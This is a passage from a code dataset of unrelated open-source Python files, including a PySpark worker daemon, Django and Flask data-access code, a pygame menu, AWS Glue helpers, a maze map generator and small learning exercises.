listen_sock.accept()\n except EnvironmentError as err:\n if err.errno != EINTR:\n raise\n\n if sock is not None:\n # Fork a child to handle the client.\n # The client is handled in the child so that the manager\n # never receives SIGCHLD unless a worker crashes.\n if os.fork() == 0:\n # Leave the worker pool\n signal(SIGHUP, SIG_DFL)\n listen_sock.close()\n # Handle the client then exit\n sockfile = sock.makefile()\n exit_code = 0\n try:\n worker_main(sockfile, sockfile)\n except SystemExit as exc:\n exit_code = exc.code\n finally:\n sockfile.close()\n sock.close()\n os._exit(compute_real_exit_code(exit_code))\n else:\n sock.close()\n\n\ndef launch_worker(listen_sock):\n if os.fork() == 0:\n try:\n worker(listen_sock)\n except Exception as err:\n import traceback\n traceback.print_exc()\n os._exit(1)\n else:\n assert should_exit()\n os._exit(0)\n\n\ndef manager():\n # Create a new process group to corral our children\n os.setpgid(0, 0)\n\n # Create a listening socket on the AF_INET loopback interface\n listen_sock = socket(AF_INET, SOCK_STREAM)\n listen_sock.bind(('127.0.0.1', 0))\n listen_sock.listen(max(1024, 2 * POOLSIZE, SOMAXCONN))\n listen_host, listen_port = listen_sock.getsockname()\n write_int(listen_port, sys.stdout)\n\n # Launch initial worker pool\n for idx in range(POOLSIZE):\n launch_worker(listen_sock)\n listen_sock.close()\n\n def shutdown():\n global exit_flag\n exit_flag.value = True\n\n # Gracefully exit on SIGTERM, don't die on SIGHUP\n signal(SIGTERM, lambda signum, frame: shutdown())\n signal(SIGHUP, SIG_IGN)\n\n # Cleanup zombie children\n def handle_sigchld(*args):\n try:\n pid, status = os.waitpid(0, os.WNOHANG)\n if status != 0 and not should_exit():\n raise RuntimeError(\"worker crashed: %s, %s\" % (pid, status))\n except EnvironmentError as err:\n if err.errno not in (ECHILD, EINTR):\n raise\n signal(SIGCHLD, handle_sigchld)\n\n # Initialization complete\n sys.stdout.close()\n try:\n while not should_exit():\n try:\n # Spark tells us to exit by closing stdin\n if os.read(0, 512) == '':\n shutdown()\n except EnvironmentError as err:\n if err.errno != EINTR:\n shutdown()\n raise\n finally:\n signal(SIGTERM, SIG_DFL)\n exit_flag.value = True\n # Send SIGHUP to notify workers of shutdown\n os.kill(0, SIGHUP)\n\n\nif __name__ == '__main__':\n manager()\n","repo_name":"baeeq/incubator-spark","sub_path":"python/pyspark/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"571959850","text":"from datetime import datetime\nfrom datetime import date\nfrom sqlalchemy import or_, and_\n\nfrom app import db\nfrom app.models import Event, Tag\n\nclass TagsDao():\n\n def get_this_month_holiday_dates(self):\n curr_year = date.today().year\n db_tag = Tag.query.filter_by(name = 'Holiday').first()\n\n dates = []\n for db_event in db_tag.events:\n if (db_event.recurring or db_event.when == curr_year):\n dates.append(db_event.when.replace(year = curr_year) \\\n if db_event.recurring \\\n else db_event.when)\n\n return dates\n \n def get_this_month_event_dates(self):\n today = date.today()\n\n dates = []\n for db_event in Event.query.all():\n if ((db_event.when.year == today.year or db_event.recurring) \\\n and db_event.when.month == today.month):\n dates.append(db_event.when.replace(year = today.year) \\\n if db_event.recurring \\\n else db_event.when)\n\n return dates\n","repo_name":"kroldawi/Reminder","sub_path":"app/blueprints/events/daos.py","file_name":"daos.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40745498541","text":"from rest_framework_mongoengine.serializers import DocumentSerializer\nfrom rest_framework.fields import SerializerMethodField, ListField, DictField\nfrom rest_framework_mongoengine.validators import ValidationError\nfrom tree.models import Branch, BranchPost\nfrom mongoengine import EmbeddedDocumentField\n\n\nclass BranchSerializer(DocumentSerializer):\n\n class Meta:\n model = Branch\n fields = '__all__'\n read_only_fields = ('id', 'created_at', 'updated_at')\n\n\nclass BranchPostSerializer(DocumentSerializer):\n\n class Meta:\n model = BranchPost\n fields = '__all__'\n read_only_fields = ('id', 'created_at', 'updated_at')\n\n def __init__(self, *args, **kwargs):\n self.branch = kwargs.pop(\"branch\")\n super(BranchPostSerializer, self).__init__(**kwargs)\n\n def validate_values(self, values):\n if isinstance(values, dict):\n features_dict = self.branch.features_dict\n\n for key, value in values.items():\n if key not in features_dict:\n raise ValidationError(\"{} is not allowed option. [{}]\".format(key, features_dict.keys()))\n\n feature = features_dict[key]\n\n representation = feature[\"representation\"]\n if representation == \"number\":\n try:\n values[key] = float(value)\n except ValueError:\n raise ValidationError(\n {\"value\": \"'{}' is a wrong number\".format(value)})\n\n elif representation == \"choices\":\n value = str(value)\n if value not in feature[\"choices\"]:\n raise ValidationError(\n {\"value\": \"'{}' is a wrong choise\".format(value)})\n\n return values\n\n\n\n","repo_name":"alekseystryukov/treenet","sub_path":"treenet_api/tree/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4553617057","text":"import os\n\nimport pygame\n\nimport config\nfrom font import Font\nfrom game import Game\nfrom screen import Screen\n\n\nclass Menu(Screen):\n def __init__(self):\n self.font = Font(config.menufontpath, config.menufontsize)\n\n # init menu display\n self.selected = 0\n self.col_offset = 0\n \n \n def resize_view(self):\n \"\"\"Resize the view, redraw the background, reinit the font.\"\"\"\n # find the largest rectangle with the same ratio as basesize,\n # and a maximum of maxsize on either axis.\n ww, wh = self.window_view.get_size()\n bw, bh = config.menuratio\n mx, my = config.menumargin\n mult = min(ww * (1 - mx * 2) / bw, wh * (1 - my * 2) / bh)\n width, height = bw * mult, bh * mult\n left, top = (ww - width) / 2, (wh - height) / 2\n self.view = self.window_view.subsurface((left, top, width, height))\n \n # redraw the background\n self.background = pygame.Surface(self.view.get_size())\n self.background.fill(config.menubackcolor)\n \n # create text area\n tmx, tmy = config.menumargin\n tleft, ttop = tmx * width, tmy * height\n twidth, theight = width - tleft * 2, height - ttop * 2\n self.textarea = self.view.subsurface((tleft, ttop, twidth, theight))\n \n # find biggest font size that will fit the max number of rows\n # with the given leading, without going under the min size\n for size in range(config.maxfontsize, config.minfontsize - 1, -config.sizestep):\n rowtotal = size * config.maxrows\n leadtotal = int(size * config.leadpct) * (config.maxrows - 1)\n if rowtotal + leadtotal <= self.textarea.get_height():\n rows = config.maxrows\n break\n \n # if no size in range fits, start reducing number of rows\n if size == config.minfontsize:\n for rows in range(config.maxrows - 1, 0, -1):\n rowtotal = size * rows\n if rowtotal + leadtotal <= self.textarea.get_height():\n break\n \n self.fsize = size\n self.rows = rows\n self.leading = int(size * config.leadpct)\n \n # draw marker\n msize = self.fsize / 2\n self.marker = pygame.Surface((msize, msize))\n self.marker.fill((255, 0, 0))\n\n self.redraw = True\n\n\n def draw_frame(self):\n \"\"\"Draw the visible columns of options on the screen, and the marker.\"\"\"\n if self.redraw:\n # blit the background, text and marker onto the view\n self.view.blit(self.background, (0, 0))\n \n columns = config.columns\n colwidth = self.textarea.get_width() / columns\n \n srow = self.selected % self.rows\n scol = self.selected / self.rows\n \n # adjust offset to within (columns) of col\n self.col_offset = min(scol, max(self.col_offset, scol - columns + 1))\n \n # render and blit each line of text in each column that is showing\n options = self.options[self.rows * self.col_offset:\n self.rows * (self.col_offset + columns)]\n optfonts = self.font.render([option[0] for option in options],\n self.fsize, color=config.menufontcolor)\n \n for i, optfont in enumerate(optfonts):\n pos = (i / self.rows * colwidth + self.fsize,\n i % self.rows * (self.fsize + self.leading))\n self.textarea.blit(optfont, pos)\n \n # blit marker\n mmargin = self.fsize / 4\n self.textarea.blit(self.marker, ((scol - self.col_offset) * colwidth + mmargin,\n srow * (self.fsize + self.leading) + mmargin))\n \n self.redraw = False\n\n\n def run_frame(self, elapsed, keys):\n \"\"\"Scan for keystrokes and either switch menus or take actions.\"\"\"\n for key, keydown in keys:\n # arrow keys: change selection\n if keydown and key in (pygame.K_UP, pygame.K_RIGHT,\n pygame.K_DOWN, pygame.K_LEFT):\n col = self.selected / self.rows\n totalcols = (len(self.options) + self.rows - 1) / self.rows\n old_selected = self.selected\n\n if key in (pygame.K_UP, pygame.K_DOWN):\n # move marker up or down\n mod = 1 if key == pygame.K_DOWN else -1\n self.selected = max(0, min(self.selected + mod, len(self.options) - 1))\n \n elif key == pygame.K_LEFT and col > 0:\n # move marker left\n self.selected -= self.rows\n \n elif key == pygame.K_RIGHT and col < totalcols - 1:\n # move marker right\n self.selected = min(self.selected + self.rows,\n len(self.options) - 1)\n \n if self.selected != old_selected:\n self.redraw = True\n \n # enter key: open selected screen or quit this menu\n elif keydown and key == pygame.K_RETURN:\n screen, args = self.options[self.selected][1:]\n \n if not screen:\n return False\n \n self.selected = 0\n self.redraw = True\n return screen(*args)\n \n # escape key: quit menu\n elif keydown and key == pygame.K_ESCAPE:\n return False\n \n\n\nclass MainMenu(Menu):\n def __init__(self, leveldata):\n self.options = [('Play Game', LevelSelect, [leveldata]),\n ('Quit Game', False, ()),\n ]\n Menu.__init__(self)\n\n\n\nclass LevelSelect(Menu):\n def __init__(self, leveldata):\n self.options = [('Level ' + str(i + 1), Game, [leveldata, i])\n for i in range(len(leveldata))]\n Menu.__init__(self)\n\n ","repo_name":"saltire/roverchip","sub_path":"roverchip/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11742117594","text":"from contextlib import contextmanager\nfrom typing import Generator\n\nfrom botocore.exceptions import ClientError\nfrom data_platform_logging import DataPlatformLogger\nfrom infer_glue_schema import InferredMetadata\n\n\ndef create_raw_athena_table(\n metadata: InferredMetadata, logger: DataPlatformLogger, glue_client\n) -> None:\n \"\"\"\n Creates an empty athena table from the raw file pushed by\n a data producer for raw data.\n \"\"\"\n database_name = metadata.database_name\n create_glue_database(glue_client, database_name, logger)\n\n # Create raw data table, recreating it if necessary\n table_name = metadata.table_name\n try:\n glue_client.delete_table(DatabaseName=database_name, Name=table_name)\n except ClientError:\n pass\n glue_client.create_table(**metadata.metadata_str)\n logger.info(f\"created table {database_name}.{table_name}\")\n\n\ndef create_glue_database(glue_client, database_name, logger):\n \"\"\"If a glue database doesn't exist, create a glue database\"\"\"\n try:\n glue_client.get_database(Name=database_name)\n except ClientError as e:\n if e.response[\"Error\"][\"Code\"] == \"EntityNotFoundException\":\n db_meta = {\n \"DatabaseInput\": {\n \"Description\": \"database for {} products\".format(database_name),\n \"Name\": database_name,\n }\n }\n glue_client.create_database(**db_meta)\n else:\n logger.error(\"Unexpected error: %s\" % e)\n raise\n\n\ndef delete_raw_athena_table(\n metadata: InferredMetadata, logger: DataPlatformLogger, glue_client\n):\n glue_client.delete_table(\n DatabaseName=metadata.database_name, Name=metadata.table_name\n )\n logger.info(f\"removed raw table {metadata.database_name}.{metadata.table_name}\")\n\n\n@contextmanager\ndef temporary_raw_athena_table(\n metadata: InferredMetadata, logger: DataPlatformLogger, glue_client\n) -> Generator[None, None, None]:\n try:\n create_raw_athena_table(\n metadata=metadata, logger=logger, glue_client=glue_client\n )\n yield\n finally:\n delete_raw_athena_table(\n metadata=metadata, logger=logger, glue_client=glue_client\n )\n","repo_name":"ministryofjustice/data-platform","sub_path":"containers/daap-athena-load/src/var/task/create_raw_athena_table.py","file_name":"create_raw_athena_table.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"74519382883","text":"import numpy as np\n\n#in this file I will be using the numpy library to simplify and reduce the bolierplate of the code\n#numpy offers different funtions for calculation.\n\ndef neuron_with_np():\n inputs = [1, 2, 3, 2.5]\n weights = [0.2, 0.8, -0.5, 1.0]\n\n bias = 2\n\n #the funtion dot multiplies each element with other and adds it toghater e.g. w0*i0+.... + bias\n output = np.dot(weights, inputs) + bias\n return output\n\ndef layer_of_neurons_with_np():\n inputs = [1, 2, 3, 2.5]\n weights = [[0.2, 0.8, -0.5, 1.0],\n [0.5, -0.91, 0.26, -0.5],\n [-0.26, -0.27, 0.17, 0.87]]\n \n bias = [2, 3, 0.5]\n\n #Since now I am working with a layer of neurons it is important to pas the parammeters to the dot funtion in the right oder\n #we pass the weights first since the first parrameter determins how the array will be indexed \n #the funtion will do the same thing however it will output 3 resaults since it will add the the inputs to each neuron and there are 3 neurons in total \n output = np.dot(weights, inputs) + bias\n return output\n\nneuron_output = neuron_with_np()\nprint(f\"Single neuron calculation using numPy: {neuron_output}\")\n\nlayer_output = layer_of_neurons_with_np()\nprint(f\"Layer of neurons calculation using numPy: {layer_output}\")","repo_name":"bombor11/Coding-Projects","sub_path":"AI/Practice/numpy_neural_netwok.py","file_name":"numpy_neural_netwok.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35200025","text":"import csv\n\nMODEL = '\"model\": \"preguntas.pregunta\",'\n\n\ndef armarRegistro(fila):\n clave = f'\"pk\": {int(fila[0])},'\n campos = '\"fields\": {'\n categoria = f'\"categoria\": {int(fila[1])}'\n texto = f'\"texto\": \"{fila[2]}\",'\n categoria += '}}'\n\n linea = '{' + MODEL + clave + campos + texto + categoria + ','\n return linea\n\n\nwith open('Preguntascsv.csv', encoding=\"utf8\") as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=';')\n line_count = 0\n print(\"[\")\n for row in csv_reader:\n if line_count == 0:\n print(f'Column names are {\", \".join(row)}')\n line_count += 1\n else:\n print(armarRegistro(row))\n line_count += 1\n print(\"]\")\n\n\n","repo_name":"jhgakiyama/informatorio2021","sub_path":"crearJsonPreguntas.py","file_name":"crearJsonPreguntas.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13734412386","text":"# Faça um programa que leia um nome de usuário e a sua senha e \n# não aceite a senha igual ao nome do usuário, mostrando uma mensagem\n# de erro e voltando a pedir as informações.\n\nnome = input(\"Digite seu nome: \")\nsenha = input(\"Digite sua senha: \")\n\nvalidaSenha = False\n\nwhile validaSenha == False:\n if nome == senha:\n print(\"Erro! A senha não pode ser igual ao nome!\")\n senha = input(\"Digite sua senha: \")\n else:\n validaSenha = True","repo_name":"alencarburitijr/EFG-Python-Basico","sub_path":"Aula05/Exercicio02.py","file_name":"Exercicio02.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40720876963","text":"# -*- mode: python -*-\n\nblock_cipher = None\n\n\na = Analysis(['main.py'],\n pathex=['C:\\\\Windows\\\\System32\\\\downlevel', 'E:\\\\carbonic'],\n binaries=[],\n datas=[],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=['PyQt5.Qt5Qml', 'PyQt5.Qt5Quick', 'PyQt5.Qt5Network'],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\n# spec function\n\n# pyinstaller exe file size reduced with the help of https://github.com/pyinstaller/pyinstaller/issues/2270\n# Thanks to solution by @choice17\n\n\nKey = ['Qt5Qml','Qt5Quick', 'Qt5Network']\n\ndef remove_from_list(input, keys):\n outlist = []\n for item in input:\n name, _, _ = item\n flag = 0\n for key_word in keys:\n if name.find(key_word) > -1:\n flag = 1\n if flag != 1:\n outlist.append(item)\n return outlist\n\na.binaries = remove_from_list(a.binaries, Key)\n\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='carbonic',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n runtime_tmpdir=None,\n console=False , icon='res\\\\g960.ico')\n","repo_name":"srevinsaju/carbonic","sub_path":"carbonic-win.spec","file_name":"carbonic-win.spec","file_ext":"spec","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"14874929174","text":"import logging\nLOGGER = logging.getLogger(__name__)\n\nfrom .base import BaseModelSerializer\nfrom ....utils.auth import get_org_model\n\nOrg = get_org_model()\n\n\nclass OrgSerializer(BaseModelSerializer):\n class Meta:\n model = Org\n fields = ['id', 'name', 'subdomain', 'preference_auth_google_oauth2',\n 'preference_auth_email_autocreate_domains',]\n","repo_name":"soby/django-inquiry","sub_path":"inquiry/core/api/v1/serializers/org.py","file_name":"org.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32060860353","text":"#! /usr/bin/python3\n#-*- coding: utf-8-*-\n#\n# Escola del Treball 2020-21\n# M03 Programacio\n# Exercicis de nadal\n# Felicitacio nadalenca\n# Cristian Fernando Condolo Jimenez\n# isx41016667\n# 23/12/2020\n# \n# Descripcion:\n# Hacer un programa que pase un numero entero positivo y dibuje un aveto de navidad.\n\n# Juego de pruebas\n# entrada salida\n# 6 *\n# ***\n# *****\n# *******\n# *********\n# ***********\n# ***\n# ***\n# ***\n# ***\n\n# E.E. 1 num int\n\n# Programa\nimport sys\n\nAMPLITUD = 81\t\t#l'amplitud de la pantalla\nMISSATGE = f'Usage: felicitacio nadalena num {AMPLITUD // 2}'\nCARACTER = '*'\nBLANC = ' '\nLLARGADA_TRONC = 4\nAMPLADA_TRONC = 3\n\n# CONTROL D'ERRORS\n# perque no peti si no hi ha argument, cal comprovar la llargada de sys.argv\nif len(sys.argv) < 2:\n print(MISSATGE)\n exit(1)\n\n# com que ho hem comprovat abans aquesta linia no petara\ncadena = sys.argv[1]\n\n# comprovar que es un enter i major de 0\nif not cadena.isdigit():\n print(MISSATGE)\n exit(1)\n\n# ara no petara al fer int()\nllargada = int(cadena)\n\nmeitat = AMPLITUD // 2 \n# descartem els enters que no ens van bé\nif llargada > meitat :\n\tprint(MISSATGE)\n\texit(1)\n\n# PROGRAMA PRINCIPAL\nblancs = meitat\npunts = 1\n\n# dibuixo la copa\nfor i in range(0, llargada):\n\tprint(f'{BLANC * blancs}{CARACTER * punts}')\n\tblancs = blancs - 1\n\tpunts = punts + 2\n\t\n#dibuixo el tronc\nfor i in range(0, LLARGADA_TRONC):\n\tprint(f'{(meitat - 1) * BLANC}{AMPLADA_TRONC * CARACTER}')","repo_name":"KeshiKiD03/Python-ipc","sub_path":"Apuntes/Apuntes Christian/Programacio/UF1/Exercicis de nadal/felicitaciones_navideñas(2).py","file_name":"felicitaciones_navideñas(2).py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1135614288","text":"\"\"\"\nnavigate: Navigation software\n\nUsage:\n navigate [--plot] [--min-depth=DEPTH] \n navigate -h | --help\n navigate --version\n\nOptions:\n -h --help show this help\n --version show version info\n -d --min-depth=DEPTH compute using this minimum ship depth [default: 0]\n -p --plot plot results (assumes `pip install navigate[plot]`)\n\"\"\"\nimport os\nimport logging\n\nimport docopt\n\nfrom .io import get_last_depth, to_geojson\nfrom .algorithms import navigate\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\n\ndef parse_command_line():\n \"\"\"parse command line options\"\"\"\n options = docopt.docopt(__doc__)\n logger.info('options: %s', options)\n # parse and check input files\n options['filename'] = options['']\n assert os.path.isfile(options['filename']), 'file should exist'\n options['min-depth'] = float(options['--min-depth'])\n return options\n\n\ndef main():\n \"\"\"run the main program\"\"\"\n options = parse_command_line()\n filename = options['filename']\n data = get_last_depth(filename)\n navigation_results = navigate(data, options)\n print(to_geojson(navigation_results['xy']))\n","repo_name":"openearth/navigate","sub_path":"navigate/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8652273225","text":"import numpy as np\r\nfrom tqdm import tqdm\r\n\r\nbinmax = 1000\r\n# distribution ratio for each crystal system\r\nratio = np.array([1, 1, 1, 1, 1, 1, 1])\r\nfilename = str(ratio).replace(\" \", \"\").replace(\"[\", \"\").replace(\"]\", \"\")\r\nrdf = f\"td_fullrdf_mp\"\r\n\r\nsamples = np.load(f\"{rdf}/training_data_mp_{binmax}_pbc_big.npy\", allow_pickle=True)\r\nprint(f\"Batch size: {len(samples)}\")\r\n\r\nsystem = np.zeros(7)\r\nspgrp = np.zeros(230, dtype=int)\r\nfor X, y, z in samples:\r\n system[np.argmax(y)] += 1\r\n spgrp[np.argmax(z)] += 1\r\nprint(f\"Initial dataset: {system}\\n{spgrp}\")\r\n\r\n# # Balancing datasets for each space group\r\n# np.random.shuffle(samples)\r\n# spgrp = np.zeros(230, dtype=int)\r\n# for X, y, z in samples:\r\n# spgrp[np.argmax(z)] += 1\r\n# print(\"Balancing datasets\")\r\n# for i in tqdm(range(len(spgrp))):\r\n# j = 0\r\n# nToDel = spgrp[i] - 100\r\n# while j < len(samples):\r\n# if nToDel > 0:\r\n# if int(np.argmax(samples[j][2])) == i:\r\n# samples = np.delete(samples, [j][:], axis=0)\r\n# j -= 1\r\n# nToDel -= 1\r\n# j += 1\r\n\r\n# Balancing datasets for each crystal system\r\n# Number of samples per group (target number)\r\nn_pergroup = 4100\r\n\r\nnp.random.shuffle(samples)\r\nsystem = np.zeros(7, dtype=int)\r\nfor X, y, z in samples:\r\n system[np.argmax(y)] += 1\r\nprint(\"Balancing datasets\")\r\nfor i in tqdm(range(len(system))):\r\n j = 0\r\n nToDel = system[i] - int(n_pergroup * ratio[i])\r\n while j < len(samples):\r\n if nToDel > 0:\r\n if int(np.argmax(samples[j][1])) == i:\r\n samples = np.delete(samples, [j][:], axis=0)\r\n j -= 1\r\n nToDel -= 1\r\n j += 1\r\n\r\n# Displaying final distribution of dataset\r\nsystem = np.zeros(7)\r\nspgrp = np.zeros(230, dtype=int)\r\nfor X, y, z in samples:\r\n system[np.argmax(y)] += 1\r\n spgrp[np.argmax(z)] += 1\r\nprint(f\"Final dataset: {system}\\n{spgrp}\")\r\n\r\nnp.random.shuffle(samples)\r\n# Filename after packing and balancing\r\nnp.save(f\"packed_td/{rdf}_{filename}_{binmax}.npy\", samples)","repo_name":"chantomkit/Neural-network-for-classifying-crystal-systems-from-RDF","sub_path":"training_data_packing.py","file_name":"training_data_packing.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30918734767","text":"import random\n\n# Easy to read representation for each cardinal direction.\nN, S, W, E = ('n', 's', 'w', 'e')\n\nclass Cell(object):\n \"\"\"\n Class for each individual cell. Knows only its position and which walls are\n still standing.\n \"\"\"\n def __init__(self, x, y, walls):\n self.x = x\n self.y = y\n self.walls = set(walls)\n\n def __repr__(self):\n # <15, 25 (es )>\n return '<{}, {} ({:4})>'.format(self.x, self.y, ''.join(sorted(self.walls)))\n\n def __contains__(self, item):\n # N in cell\n return item in self.walls\n\n def is_full(self):\n \"\"\"\n Returns True if all walls are still standing.\n \"\"\"\n return len(self.walls) == 4\n\n def _wall_to(self, other):\n \"\"\"\n Returns the direction to the given cell from the current one.\n Must be one cell away only.\n \"\"\"\n assert abs(self.x - other.x) + abs(self.y - other.y) == 1, '{}, {}'.format(self, other)\n if other.y < self.y:\n return N\n elif other.y > self.y:\n return S\n elif other.x < self.x:\n return W\n elif other.x > self.x:\n return E\n else:\n assert False\n\n def connect(self, other):\n \"\"\"\n Removes the wall between two adjacent cells.\n \"\"\"\n other.walls.remove(other._wall_to(self))\n self.walls.remove(self._wall_to(other))\n\nclass Maze(object):\n \"\"\"\n Maze class containing full board and maze generation algorithms.\n \"\"\"\n\n def __init__(self, width=20, height=20):\n \"\"\"\n Creates a new maze with the given sizes, with all walls standing.\n \"\"\"\n self.width = width\n self.height = height\n self.cells = []\n for y in range(self.height):\n for x in range(self.width):\n self.cells.append(Cell(x, y, [N, S, E, W]))\n\n def __getitem__(self, index):\n \"\"\"\n Returns the cell at index = (x, y).\n \"\"\"\n x, y = index\n if 0 <= x < self.width and 0 <= y < self.height:\n return self.cells[x + y * self.width]\n else:\n return None\n\n def neighbors(self, cell):\n \"\"\"\n Returns the list of neighboring cells, not counting diagonals. Cells on\n borders or corners may have less than 4 neighbors.\n \"\"\"\n x = cell.x\n y = cell.y\n for new_x, new_y in [(x, y - 1), (x, y + 1), (x - 1, y), (x + 1, y)]:\n neighbor = self[new_x, new_y]\n if neighbor is not None:\n yield neighbor\n\n def _gid_matrix(self):\n str_matrix = [[0] * (self.width * 2 + 1)\n for i in range(self.height * 2 + 1)]\n\n for cell in self.cells:\n x = cell.x * 2 + 1\n y = cell.y * 2 + 1\n str_matrix[y][x] = 1\n if N not in cell and y > 0:\n str_matrix[y - 1][x + 0] = 1\n if S not in cell and y + 1 < self.width:\n str_matrix[y + 1][x + 0] = 1\n if W not in cell and x > 0:\n str_matrix[y][x - 1] = 1\n if E not in cell and x + 1 < self.width:\n str_matrix[y][x + 1] = 1\n \n #print(str_matrix)\n \n data_list=[]\n \n for x in range(self.height*2+1):\n for y in range(self.width*2+1):\n data=0\n if str_matrix[x][y] == 1:\n data = 57\n\n else:\n data = 211 \n if x == 0:\n n = 1\n else:\n n = str_matrix[x-1][y]\n\n if x == self.height*2:\n s = 1\n else:\n s = str_matrix[x+1][y]\n\n if y == 0:\n w = 1\n else:\n w = str_matrix[x][y-1]\n\n if y == self.width*2:\n e = 1\n else:\n e = str_matrix[x][y+1]\n\n\n\n # append gid at array data\n if n == 0 and e == 0 and s == 0 and w == 0:\n data=241\n elif n == 0 and e == 0 and s == 0 and w == 1:\n data=225\n elif n == 0 and e == 0 and s == 1 and w == 0:\n data=239\n elif n == 0 and e == 0 and s == 1 and w == 1:\n data=223\n elif n == 0 and e == 1 and s == 0 and w == 0:\n data=233\n elif n == 0 and e == 1 and s == 0 and w == 1:\n data=217\n elif n == 0 and e == 1 and s == 1 and w == 0:\n data=231\n elif n == 0 and e == 1 and s == 1 and w == 1:\n data=215\n elif n == 1 and e == 0 and s == 0 and w == 0:\n data=237\n elif n == 1 and e == 0 and s == 0 and w == 1:\n data=221\n elif n == 1 and e == 0 and s == 1 and w == 0:\n data=235\n elif n == 1 and e == 0 and s == 1 and w == 1:\n data=219\n elif n == 1 and e == 1 and s == 0 and w == 0:\n data=229\n elif n == 1 and e == 1 and s == 0 and w == 1:\n data=213\n elif n == 1 and e == 1 and s == 1 and w == 0:\n data=227\n \n # broken wall: 10%\n if random.randrange(1,11) == 1:\n isBrokenWall = 1\n else:\n isBrokenWall = 0\n data += isBrokenWall\n data_list.append(data)\n print(data_list)\n return data_list\n\n def randomize(self):\n \"\"\"\n Knocks down random walls to build a random perfect maze.\n Algorithm from http://mazeworks.com/mazegen/mazetut/index.htm\n \"\"\"\n cell_stack = []\n cell = random.choice(self.cells)\n n_visited_cells = 1\n\n while n_visited_cells < len(self.cells):\n neighbors = [c for c in self.neighbors(cell) if c.is_full()]\n if len(neighbors):\n neighbor = random.choice(neighbors)\n cell.connect(neighbor)\n cell_stack.append(cell)\n cell = neighbor\n n_visited_cells += 1\n else:\n cell = cell_stack.pop()\n\n @staticmethod\n def generate(width=20, height=20):\n \"\"\"\n Returns a new random perfect maze with the given sizes.\n \"\"\"\n m = Maze(width, height)\n m.randomize()\n return m\n \n\nclass MazeGame(object):\n \"\"\"\n Class for interactively playing random maze games.\n \"\"\"\n def __init__(self, maze):\n self.maze = maze or Maze.generate()\n\n def _get_random_position(self):\n \"\"\"\n Returns a random position on the maze.\n \"\"\"\n return (random.randrange(0, self.maze.width),\n random.randrange(0, self.maze.height))\n\n\nif __name__ == '__main__':\n import sys\n if len(sys.argv) > 1:\n width = int(sys.argv[1])\n if len(sys.argv) > 2:\n height = int(sys.argv[2])\n else:\n height = width\n else:\n width = 20\n height = 20\n map_width = width*2+1\n map_height = height*2+1\n f = open(\"games/example/map1.tmx\", 'w')\n f.write(' \\n')\n f.write(' \\n' % map_height)\n f.write(' \\n')\n f.write(' \\n')\n f.write(' \\n')\n f.write(' \\n')\n f.write(' \\n')\n f.write(' \\n')\n f.write(' \\n')\n f.write(' \\n')\n f.write(' \\n')\n f.write(' \\n' % map_height)\n f.write(' \\n')\n\n tile_map_data = Maze._gid_matrix(Maze.generate(width, height))\n for i in tile_map_data:\n data = '\\n' % i\n f.write(data)\n f.write(' \\n')\n f.write(' \\n')\n f.write(' \\n')\n\n f.close()","repo_name":"kimjngyun/A4-PCG-MapGen","sub_path":"games/example/kruskal.py","file_name":"kruskal.py","file_ext":"py","file_size_in_byte":8766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74864554405","text":"import torch\nimport torch.nn.functional as F\nfrom torch import nn, cuda\nfrom torch.autograd import Variable\n\nclass PartialConv2d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=1, bias=False, dilation=1, mask_channels=1):\n super(PartialConv2d, self).__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.mask_channels = mask_channels\n self.kernel_size = [kernel_size, kernel_size]\n self.stride = stride\n self.padding = padding\n self.bias = bias\n self.dilation = dilation\n\n self.conv = nn.Conv2d(self.in_channels, self.out_channels, self.kernel_size, stride=self.stride, dilation=self.dilation, padding=self.padding, bias=self.bias)\n\n# if self.mask_channels > 1:\n# self.weight_maskUpdater = torch.ones(self.out_channels, self.mask_channels, self.kernel_size[0], self.kernel_size[1])\n# else:\n self.weight_maskUpdater = torch.ones(1, self.mask_channels, 